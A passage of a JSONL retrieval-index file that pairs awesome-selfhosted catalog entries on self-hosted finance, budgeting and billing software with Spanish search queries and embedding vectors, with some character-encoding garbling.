0.00788, -0.03597, 0.00689, 0.02938, 0.00405, 0.00071, 0.01175, -0.04311, 0.03679, 0.01139, 0.00927, 0.03198, 0.05025, 0.02568, -0.01268, -0.01181, 0.02859, -0.04623, -0.0348, -0.01258, 0.02564, -0.0681, 0.02987, -0.0413, -0.0552, -0.00908, -0.01544, 0.04273, 0.03811, 0.01283, -0.02851, -0.02053, -0.02543, -0.04464, -0.00612, -0.01793, -0.05515, 0.02032, 0.05428, -0.04049, 0.00779, 0.01732]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "busco una herramienta de contabilidad para pequeΓ±as empresas que funcione en mi servidor local", "v": [0.121, -0.00108, -0.18665, -0.17143, 0.03236, -0.26334, -0.02514, -0.09079, -0.09031, -0.10556, -0.06765, -0.01651, -0.02921, -0.01932, 0.03999, -0.00441, 0.06027, -0.19483, 0.0345, -0.00688, 0.04621, 0.01373, -0.01094, 0.14832, -0.05929, 0.00268, 0.06035, -0.1176, -0.17688, 0.09909, 0.09614, -0.02679, 0.04999, -0.07779, 0.00845, -0.10567, -0.0529, 0.06047, -0.04056, -0.0466, 0.10536, 0.03163, -0.07278, 0.03588, 0.01881, -0.00989, 0.04141, -0.06268, 0.01202, 0.14954, -0.09292, -0.15029, -0.14132, -0.02925, -0.05815, 0.00281, 0.06311, -0.0749, 0.1177, -0.02495, -0.12438, -0.00476, -0.05323, -0.0472, -0.00783, 0.04167, 0.02438, -0.10952, -0.0344, 0.00967, -0.11727, 0.05099, -0.10239, -0.09296, 0.04784, 0.01117, 0.07652, 0.06226, 0.03286, 0.02821, 0.03034, 0.00728, -0.02057, 0.11492, -0.11773, -0.06688, 0.04267, 0.01445, 0.04866, 0.01873, 0.00227, -0.00064, -5e-05, 0.05168, -0.03345, 0.06429, 0.1267, -0.01248, -0.0577, -0.01863, 0.08054, -0.00064, -0.11947, 0.02735, 0.01132, 0.11439, -0.01981, -0.04081, 0.01239, -0.00885, 0.04477, -0.04195, 0.01842, -0.00525, -0.0784, 0.03781, -0.00096, -0.0508, 0.02226, 0.01745, -0.01526, -0.02777, 0.05384, 0.01369, -0.02419, -0.07545, 0.0262, 0.09858, 0.06336, -0.09537, 0.01637, -0.08878, -0.09634, -0.01214, 0.00099, 0.0638, -0.00148, -0.02959, 0.02735, -0.06334, -0.03252, -0.01853, -0.04521, -0.02229, 0.11807, 0.03366, 0.06278, -0.01896, -0.0997, 0.09212, 0.08075, -0.09418, -0.09754, 0.00787, -0.13511, 0.00537, 0.07399, -0.0164, -0.05604, 0.08854, 0.03055, -0.03362, 0.00543, 0.00645, 0.02246, -0.08803, -0.00509, 0.03697, 0.09359, 0.01043, -0.05124, 0.02038, 0.0155, -0.08948, 0.05041, -0.03228, -0.03583, -0.06551, 0.02184, -0.04841, -0.03318, 0.0315, 0.00209, 0.0017, -0.00067, 0.01775, 0.02157, -0.00451, 0.01705, 0.03241, 0.04633, -0.02125, -0.03346, -0.02893, 0.00599, -0.00534, 0.00572, -0.06612, -0.0043, -0.00708, -0.06126, -0.04306, -0.10048, -0.02466, 0.01025, 0.07917, -0.04483, 0.03954, -0.01174, 0.03923, 0.03646, 0.00631, 0.01736, -0.02264, -0.02788, -0.0018, -0.00389, -0.07963, 0.03935, 0.01069, 0.00813, -0.05213, 0.0781, -0.00811, -0.01979, 0.00871, 0.04931, -0.01367, 0.01017, -0.00096, -0.00966, 0.05425, -0.03358, -0.03348, 0.0012, -0.08392, 0.02942, -0.0254, -0.03775, -0.05922, 0.03622, 0.07761, -0.0187, -0.01604, -0.04699, -0.05745, -0.01175, -0.03379, -0.04694, -0.03328, -0.06362, -0.01055, 0.05527, -0.00259, 0.00541, -0.01081]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "necesito una aplicaciΓ³n de presupuesto familiar que me permita importar transacciones automΓ‘ticamente desde varios bancos", "v": [0.17654, 0.22566, -0.09218, -0.17737, 0.11648, -0.02139, 0.0662, -0.05623, -0.26479, -0.04017, -0.13755, -0.07129, 0.01472, -0.04081, -0.04308, -0.02197, -0.07885, -0.09268, 0.13728, 0.04278, 0.11333, -0.11998, -0.03668, 0.01666, -0.05915, 0.0549, 0.02447, -0.08673, -0.17047, 0.05118, 0.05803, -0.1023, 0.10525, -0.0688, 0.02444, -0.08167, 0.09948, 0.03476, 0.03383, -0.07618, 0.18973, -0.00275, -0.04097, -0.0208, 0.04663, 0.03581, 0.00747, 0.11288, -0.02979, -0.07344, 0.06621, -0.05461, -0.06294, 0.09215, 0.00561, -0.01426, 0.07752, -0.03327, 0.01227, -0.02283, -0.08521, 0.01967, 0.10062, 0.06499, -0.02909, 0.04629, 0.07397, 0.02523, 0.03536, -0.00262, -0.07251, 0.10258, -0.06643, 0.11091, -0.00205, -0.0004, 0.08935, -0.08053, -0.04798, -0.02326, -0.05042, -0.07541, 0.0108, 0.08257, -0.02768, -0.03867, 0.01302, 0.08549, 0.16496, 0.07552, -0.08263, -0.1218, -0.07908, -0.01895, 0.06544, -0.02216, -0.03113, 0.02955, 0.06043, 0.00827, -0.00093, -0.08806, -0.10343, 0.04581, -0.05635, 0.04895, 0.06996, -0.0274, -0.06099, -0.05346, 0.00279, 0.00933, 0.00248, 0.00816, -0.02049, 0.01327, 0.02767, 0.03727, 0.03857, -0.01436, -0.12081, -0.04569, 0.07391, 0.02931, -0.00155, -0.08422, -0.03306, 0.05069, 0.00996, 0.06649, -0.02395, 0.03004, -0.09235, -0.04697, -0.03783, -0.00045, -0.04873, -0.04228, -0.02799, -0.03628, -0.02196, -0.01449, 0.01548, -0.00929, 0.07561, 0.04477, -0.04827, -0.0525, -0.0459, 0.0205, 0.06864, 0.00622, -0.03836, 0.06722, -4e-05, 0.02342, 0.01111, -0.00158, -0.05754, -0.00338, 0.00205, 0.01724, 0.0162, -0.0552, -0.08316, -0.06262, -0.05953, -0.0164, 0.02761, 0.03745, 0.03535, 0.05412, -0.00494, -0.0841, 0.00776, -0.07648, 0.0257, -0.07922, 0.04615, -0.03508, -0.04669, -0.0106, -0.01224, -0.02656, -0.00713, -0.00382, 0.02582, 0.0358, -0.00614, -0.00274, -0.03253, 0.10206, -0.0743, 0.02174, -0.02399, -0.01946, -0.07669, 0.01144, 0.02453, 0.00441, 0.04052, 0.00637, 0.0417, -0.10072, 0.03779, 0.0819, -0.03007, 0.01185, -0.0578, 0.06066, -0.00161, 0.00592, 0.12517, 0.02196, 0.05319, -0.0052, -0.01768, -0.02496, 0.01595, 0.03584, -0.00235, 0.02984, 0.03924, 0.00977, -0.01875, 0.0169, -0.00012, -0.02173, -0.00398, 0.00947, 0.00331, 0.05282, -0.06532, -0.0691, 0.03462, 0.05515, 0.00934, -0.08176, -0.05059, 0.00152, 0.00467, 0.00846, -0.03867, -0.06067, -0.02749, -0.01978, -0.08662, 0.0361, -0.02387, -0.05305, 0.01085, 0.07254, 0.06646, -0.00575, 0.0465, -0.04767]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "que programa puedo usar para procesar pagos con criptomonedas y aceptar pagos Web3 directamente a la billetera", "v": [0.20835, 0.03169, -0.16662, -0.08411, 0.06365, -0.06483, 0.22104, -0.10963, -0.17005, -0.11291, -0.09465, -0.05064, -0.01307, -0.00331, -0.03103, -0.00156, -0.02722, 0.0348, 0.11001, -0.03201, 0.09694, -0.06349, -0.02428, -0.10902, -0.06762, 0.13226, 0.06285, -0.03307, -0.09587, 0.0769, 0.07303, -0.08055, 0.05062, -0.10982, -0.00259, 0.00175, -0.01823, 0.00389, 0.09356, 0.04095, 0.14555, 0.04198, 0.02822, 0.01227, -0.00271, -0.04774, 0.07845, 0.03966, 0.0015, -0.13413, 0.01452, -0.02612, -0.13796, 0.05713, -0.04004, -0.03038, 0.10055, -0.10995, -0.07628, 0.04354, -0.04048, 0.13013, 0.10295, 0.03609, -0.11128, 0.01351, 0.04153, 0.07614, -0.03856, 0.0589, -0.04422, 0.10981, 0.02652, 0.07474, 0.07045, -0.00854, -0.02646, -0.06414, 0.05854, -0.01255, -0.03516, -0.0331, -0.01484, 0.16032, -0.10069, 0.00145, 0.0392, -0.09956, 0.06025, 0.01648, -0.03185, 0.05369, 0.07187, 0.00166, 0.03368, -0.00381, 0.00851, -0.0647, -0.02302, 0.0329, 0.02157, -0.04514, -0.07573, 0.07381, 0.01687, 0.10644, 0.09164, 0.03653, 0.01203, -0.05714, -0.00217, -0.00823, -0.05776, -0.00363, -0.09891, 0.03009, 0.05431, 0.03326, 0.02339, -0.04633, -0.05046, 0.02244, -0.04889, -0.01808, 0.09502, 0.00865, -0.04104, 0.09174, -0.01481, 0.03688, -0.0993, -0.00165, -0.05109, -0.01631, -0.01863, -0.04787, -0.01934, -0.02174, 0.08529, 0.06393, 0.11094, 0.02631, -0.00144, 0.03909, 0.14809, -0.00867, 0.00184, -0.04112, -0.14538, -0.0167, 0.06665, -0.01492, -0.04822, 0.0208, -0.10948, -0.05747, 0.05576, -0.02994, -0.09714, 0.04384, -0.04638, 0.03027, 0.01029, -0.04805, -0.02738, -0.05777, -0.02763, 0.046, -0.03056, 0.0536, 0.04738, 0.06454, -0.00286, -0.05162, 0.04373, -0.04333, -0.04904, -0.10461, 0.07102, -0.00924, -0.0251, 0.03659, -0.028, -0.05211, -0.02349, 0.04238, -0.0147, 0.108, -0.04906, 0.07067, 0.02647, 0.05142, -0.06555, 0.02685, 0.03462, -0.03344, -0.0262, -0.0219, -0.04998, -0.02863, -0.0087, 0.10503, 0.02291, -0.0215, -0.07033, 0.05392, -0.06213, -0.00059, -0.00768, 0.05782, 0.02974, -0.04021, 0.06777, -0.0485, 0.03768, -0.03613, 0.00355, 0.05549, -0.04625, 0.04792, -0.01876, 0.0283, -0.00447, -0.0172, 0.08035, 0.00891, 0.0299, 0.00843, -0.04269, -0.02327, -0.03215, 0.03499, -0.07269, -0.03106, -0.02576, 0.02572, -0.00295, -0.05267, -0.08488, -0.00228, 0.01716, 0.09735, -0.01458, -0.01147, -0.00961, 0.01653, -0.05962, -0.06319, -0.06909, -0.04376, -0.00881, 0.04716, 0.04693, 0.01283, 0.02925, 0.02998]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "que programa hay para gestionar cuentas en familia que funcione solo en mi ordenador?", "v": [0.02419, 0.12901, -0.06889, -0.20787, 0.06956, -0.18427, -0.0022, -0.01512, -0.12346, -0.08244, -0.05977, -0.07929, 0.00741, -0.00501, 0.0579, -0.09881, 0.08552, -0.03828, 0.01414, -0.00467, -0.04535, 0.02386, 0.02422, -0.02224, -0.05281, -0.00182, 0.07926, -0.04676, -0.09774, 0.06297, 0.10404, -0.01231, 0.10123, -0.15423, 0.07913, 0.03216, -0.03872, 0.00912, 0.0801, -0.00935, 0.06231, 0.07305, -0.0115, 0.09071, 0.11516, -0.03873, 0.08318, -0.03063, 0.05963, 0.01166, -0.08949, -0.13051, 0.01155, 0.06184, -0.05939, -0.07476, -0.03615, -0.13219, 0.05704, 0.03595, -0.08124, 0.04034, 0.05169, 0.04406, -0.03685, 0.05598, 0.10363, 0.00718, -0.04358, 0.08082, -0.14216, 0.07442, -0.03411, -0.01815, -0.00716, -0.054, 0.14677, -0.08423, 0.07143, -0.03062, -0.00333, -0.08757, -0.00767, 0.01422, -0.04873, -0.07135, 0.00026, -0.02797, 0.05226, -0.03418, -0.01107, -0.08374, -0.05014, 0.04405, 0.03038, 0.10725, 0.14493, 0.04796, -0.00059, 0.01617, 0.0483, -0.01489, -0.15742, 0.12165, -0.12188, 0.13833, 0.1093, -0.06241, -0.03037, -0.02902, -0.02588, -0.0045, -0.02779, -0.0253, -0.11092, 0.09891, -0.02432, -0.01894, -0.02188, -0.00662, -0.09001, 0.01289, 0.0861, 0.06498, 0.00663, -0.04242, -0.02166, 0.09157, -0.0131, 0.04908, -0.01912, -0.04454, 0.02157, -0.03022, -0.05792, 0.0104, -0.13421, -0.02289, -0.0104, -0.13075, -0.0213, 0.10139, -0.0004, -0.05077, 0.05551, 0.03274, 0.02697, -0.01068, -0.03623, 0.06979, 0.07853, -0.03777, -0.0298, 0.06286, -0.03938, 0.04754, 0.02048, 0.02476, -0.08033, 0.0154, -0.04827, -0.01259, 0.003, -0.01519, 0.00154, -0.02224, -0.0355, 0.04173, 0.05081, -0.02119, -0.13409, 0.11203, 0.03549, -0.04707, 0.04732, -0.07102, -0.01366, -0.0923, 0.01944, 0.04003, -0.10856, 0.069, 0.06656, 0.0055, -0.07913, 0.01231, -0.05984, 0.09023, -0.03714, -0.01415, 0.01304, 0.02127, -0.03485, 0.00907, 0.0007, 0.00941, -0.06163, -0.00477, 0.05677, 0.00344, -0.05015, 0.02223, -0.00146, 0.00073, 0.02746, 0.13522, 0.00797, 0.01746, 0.04247, 0.0771, 0.00361, 0.00075, 0.00987, 0.02709, -0.05431, 0.00602, -0.00532, -0.01672, 0.09034, 0.08441, 0.05658, 0.00961, 0.04126, 0.01442, 0.01518, -0.07723, 0.02658, -0.03797, 0.03561, -0.05378, 0.00854, -0.0059, 0.03009, 0.01323, -0.05688, 0.00664, 0.02835, -0.02351, 0.01377, 0.0088, 0.00544, 0.04322, 0.08491, -0.07137, -0.11836, -0.00114, -0.09643, 0.03333, -0.00825, -0.06731, -0.03898, 0.00127, -0.03528, -0.04335, 0.03068, 0.03468]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a las apps bancarias tradicionales para hacer presupuestos personales?", "v": [0.10894, 0.09955, -0.01526, -0.1544, 0.00951, 0.03281, 0.10335, -0.13254, -0.18788, -0.05879, -0.06283, -0.063, -0.00903, 0.011, 0.01262, -0.09911, -0.0266, -0.05642, 0.2096, 0.04186, 0.0245, -0.02209, -0.18508, 0.03778, -0.04115, -0.13804, 0.07865, -0.05065, -0.15677, 0.04059, 0.06893, -0.03134, 0.10728, -0.07199, -0.08021, 0.03665, 0.1097, 0.04682, -0.06921, -0.15065, 0.19719, -0.0267, 0.0272, 0.01167, -0.0388, -0.04529, -0.03315, 0.14541, -0.05723, -0.04138, -0.06931, -0.05069, -0.01025, 0.11852, 0.03661, -0.07834, 0.08366, -0.12683, -0.0993, -0.05004, -0.06171, 0.04209, 0.10721, 0.11106, 0.04261, 0.09256, 0.05582, 0.03379, 0.00025, 0.00265, 0.0657, 0.05541, -0.03755, 0.07424, -0.07995, 0.05145, -0.01275, -0.03963, -0.0383, 0.02629, -0.06426, -0.1318, 0.02684, 0.07731, -0.11203, -0.05869, 0.02085, 0.01117, 0.04481, -0.031, -0.04543, 0.01084, -0.07159, 0.08257, -0.05309, -0.01036, 0.01062, 0.09446, 0.01698, 0.09558, 0.02781, -0.06694, -0.1611, 0.01778, -0.07454, 0.01124, 0.04744, 0.03583, -0.04048, -0.00884, -0.02852, 0.02365, -0.0166, 0.07205, 0.02006, 0.01243, -0.03798, -0.01487, 0.01667, 0.00573, -0.03773, 0.01796, -0.01309, -0.03554, 0.02094, 0.02123, 0.04114, 0.06435, -0.02797, 0.09428, 0.01179, -0.01257, -0.06306, -0.02235, -0.12662, -0.04761, 0.03535, -0.05225, 0.01643, -0.01466, 0.01244, -0.01409, -0.01354, -0.04412, 0.04651, -0.021, -0.03176, -0.03871, -0.01768, 0.01075, 0.06026, 0.00152, -0.07809, 0.11274, -0.01782, -0.01249, -0.08052, 0.00016, -0.10693, 0.1179, 0.01759, -0.04775, -0.04121, -0.0691, -0.05225, -0.07055, 0.00496, 0.01439, 0.06224, 0.04684, 0.01755, 0.07559, 0.07203, -0.12166, 0.07243, -0.08696, 0.03672, -0.09065, 0.03287, -0.03159, -0.05387, 0.00473, -0.05381, -0.04242, 0.0496, -0.05837, 0.02605, 0.00563, 0.015, 0.0135, -0.08403, 0.03905, -0.0725, -0.0114, 0.02375, -0.0155, 0.00952, 0.01741, -0.06571, -0.00804, 0.05033, 0.03244, -0.01558, -0.07758, -0.00345, 0.02902, -0.04646, -0.00521, -0.03611, 0.09553, 0.00198, 0.00076, 0.08522, -0.00387, 0.00859, 0.01398, 0.01876, -0.0232, 0.01206, -0.00512, 0.0101, -0.01394, 0.03382, 0.01605, 0.02145, 0.07258, 0.05513, -0.01437, -0.03528, -0.03038, 0.01858, -0.02195, -0.05599, 0.00575, 0.00138, 0.0643, -0.01425, -0.02912, -0.04655, -0.01225, 0.0404, 0.04803, -0.00917, -0.01659, -0.06812, 0.02018, -0.07823, -0.00519, -0.0171, -0.02887, 0.00263, 0.09892, 0.0655, 0.05912, 0.03947, -0.04737]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "con que puedo montar un sistema de facturaciΓ³n y gestiΓ³n de activos pequeΓ±o sin pagar licencias?", "v": [0.20448, 0.06076, -0.06137, -0.19834, 0.01101, -0.09163, -0.04744, 0.0063, -0.24808, -0.06524, -0.02302, -0.12015, 0.07473, 0.04627, 0.14517, 0.0212, -0.03727, -0.20817, 0.01533, 0.03094, -0.00176, -0.01, 0.0178, -0.0683, -0.00549, 0.10413, 0.10819, -0.17664, -0.16857, 0.13635, 0.10379, 0.04853, 0.13298, -0.03228, 0.07892, 0.00273, -0.00429, 0.06045, 0.18918, 0.00976, 0.06466, 0.02496, 0.02472, -0.00031, 0.00957, -0.04317, 0.04761, 0.00019, 0.0238, -0.01025, -0.00553, -0.0324, -0.11647, -0.06258, 0.03635, -0.0434, 0.03862, -0.04702, 0.10048, -0.05464, -0.01712, 0.14179, 0.09122, 0.01373, -0.00277, 0.04209, 0.10106, 0.03338, 0.01686, 0.02693, -0.01552, -0.06126, -0.03656, 0.04293, -0.01059, -0.01937, 0.05657, -0.08535, -0.0104, 0.14395, 0.01522, -0.03554, -0.05482, 0.02763, -0.06026, -0.01251, -0.02435, -0.05699, 0.08397, 0.03505, -0.01375, -0.03252, -0.00674, 0.02501, -0.00553, 0.03312, 0.03995, 0.04703, -0.09366, -0.00931, -0.1295, 0.1075, -0.07663, 0.04993, 0.07069, 0.12, 0.13367, -0.12597, 0.02055, 0.02612, -0.02172, 0.05447, -0.04117, -0.03479, -0.04051, 0.03533, 0.01796, 0.05097, -0.0186, 0.09587, 0.02214, -0.02219, 0.08458, -0.05501, 0.09707, 0.0137, 0.05033, 0.21253, -0.00209, 0.00364, -0.00354, -0.03982, 0.02951, -0.02362, 0.00073, -0.03784, -0.06812, 0.07933, -0.06367, 0.05135, -0.04762, 0.00829, 0.04495, 0.00048, 0.11169, -0.00406, 0.01721, -0.08874, -0.03357, 0.00888, 0.02958, -0.00807, -0.02363, 0.03626, -0.0616, 0.03248, 0.09345, -0.01046, 0.00691, 0.04871, -0.007, 0.05317, -0.03861, 0.03527, -0.05034, 0.00475, -0.06136, 0.0309, 0.03441, 0.02965, -0.01325, -0.00519, 0.00503, 0.00604, 0.09454, -0.02795, -0.04952, -0.09358, 0.04535, -0.01874, -0.05664, 0.00643, -0.03066, 0.00139, -0.01207, 0.09643, -0.01855, 0.04992, -0.0052, 0.03303, 0.08613, 0.02793, 0.00603, -0.02443, 0.01493, -0.02019, -0.04453, 0.03624, -0.01065, -0.00262, 0.02246, 0.01264, 0.01324, 0.00999, 0.02513, -0.03842, 0.00276, 0.1465, 0.04187, 0.03113, 0.01794, 0.02957, 0.02248, -0.04673, -0.04237, 0.01501, -0.05655, -0.01552, -0.02985, 0.00485, 0.03945, -0.00688, 0.0131, 0.02538, 0.02861, -0.01686, -0.00265, 0.01765, 0.03758, -0.01686, -0.06403, -0.03882, -0.04985, 0.012, -0.02362, -0.04444, 0.01863, 0.02453, -0.03425, 0.00847, 0.02593, 0.06967, 0.08611, -0.01655, -0.01794, -0.0098, -0.02845, -0.04862, -0.00433, -0.01999, 0.00475, 0.03858, 0.01799, 0.02895, 0.00801, -0.0084]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "que programa sirve para gestionar gastos compartidos entre amigos?", "v": [0.03478, 0.12896, -0.13585, -0.26877, 0.02687, -0.07054, 0.03354, -0.08157, -0.07134, -0.1511, -0.02844, -0.02231, -0.01846, -0.05624, -0.01196, -0.00692, 0.0975, 0.02454, 0.06835, 0.06595, -0.00191, 0.07295, 0.0863, -0.05483, -0.08929, -0.0023, 0.07052, -0.15383, -0.09714, 0.14549, 0.08425, -0.08019, 0.00295, -0.14717, 0.01831, -0.01616, 0.06047, 0.02904, 0.06028, -0.01789, 0.04303, 0.03655, -0.05667, -0.06413, 0.13915, -0.00437, -0.07396, 0.04958, 0.0448, 0.04692, -0.08456, -0.00601, -0.03199, 0.0586, -0.00344, -0.06632, 0.02665, -0.11215, -0.12765, 0.03283, -0.06075, -0.07707, 0.02387, 0.07875, 0.00233, -0.02926, 0.12339, 0.06138, -0.10487, 0.10657, -0.06559, 0.06953, -0.05747, 0.00777, 0.01079, 0.03307, 0.05217, 0.03297, 0.03991, -0.06018, 0.04671, -0.04509, 0.00939, 0.02969, -0.01851, -0.058, 0.09845, -0.01319, 0.01019, 0.06205, -0.02235, -0.02449, -0.05166, 0.02006, -0.00202, 0.04824, 0.12908, 0.02492, 0.02384, 0.10038, 0.10293, -0.01612, -0.09029, 0.02491, -0.07788, 0.15985, 0.04417, -0.07487, 0.0074, 0.0428, 0.01138, 0.07182, 0.02484, -0.05475, -0.06615, 0.03098, 0.00795, 0.03087, 0.08756, -0.03885, -0.07307, 0.00363, -0.03178, 0.04251, 0.09984, -0.00372, -0.00361, 0.16563, 0.0296, 0.14623, -0.09062, 0.02566, 0.06516, -0.00052, -0.08991, -0.09321, -0.041, -0.00874, -0.04596, -0.09224, -0.02011, 0.07097, -0.02681, -0.03286, 0.06082, 0.01265, 0.05227, -0.0404, 0.03522, 0.07768, 0.09956, -0.02629, -0.02059, 0.04011, -0.09828, 0.00647, 0.0263, 0.0063, -0.09637, -0.01739, -0.03333, 0.03898, 0.04485, -0.00158, 0.08275, -0.08636, -0.02553, 0.05614, 0.03755, 0.0976, -0.00699, 0.04207, 0.02278, -0.0045, 0.00765, -0.02909, -0.00925, -0.18256, 0.08287, -0.00356, -0.03076, -0.00356, -0.01389, 0.04434, 